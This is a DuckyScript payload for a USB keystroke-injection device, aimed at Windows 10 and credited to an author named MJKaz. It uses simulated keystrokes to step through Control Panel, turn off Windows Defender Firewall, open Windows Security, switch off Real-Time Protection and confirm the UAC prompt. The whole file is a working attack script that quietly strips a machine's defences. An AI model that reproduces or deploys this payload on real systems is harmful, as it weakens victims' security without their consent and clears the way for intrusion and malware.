REM Tittle : Turn off Windows Firewall Defender and Real Time Protection
REM Author : MJKaz
REM Target : Windows firewall Defender and Real Time Protection
REM Windows : 10
REM Time needed : 35sec

ATTACKMODE HID
DELAY 500
GUI r
DELAY 300
STRING control
ENTER
DELAY 1000
CTRL l
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
ENTER

REM ==System and Security==

DELAY 500
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 500
TAB
ENTER

REM ==Windows Defender==

DELAY 500
CTRL l
DELAY 550
TAB
DELAY 255
TAB
DELAY 255
TAB
DELAY 255
TAB
DELAY 255
TAB
DELAY 255
ENTER

REM ==Turn ON/OFF==

DELAY 500
CTRL l
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
DOWN
DELAY 200
DOWN
DELAY 200
DOWN
DELAY 200
DOWN
DELAY 200
DOWN
DELAY 200
DOWN
DELAY 200
DOWN
DELAY 200
TAB
DELAY 500
ENTER
DELAY 1000
ALT F4
DELAY 5000

WINDOWS
DELAY 750
STRING windows security
DELAY 1250
ENTER
DELAY 2000
ENTER

REM Navigate to Manage Settings
DELAY 750
TAB
DELAY 750
TAB
DELAY 750
TAB
DELAY 750
TAB
DELAY 750
ENTER
DELAY 2750

REM Open and turn off Realtime Protection
SPACE
DELAY 3000
ALT y
DELAY 3000

REM Exit security settings
ALT F4
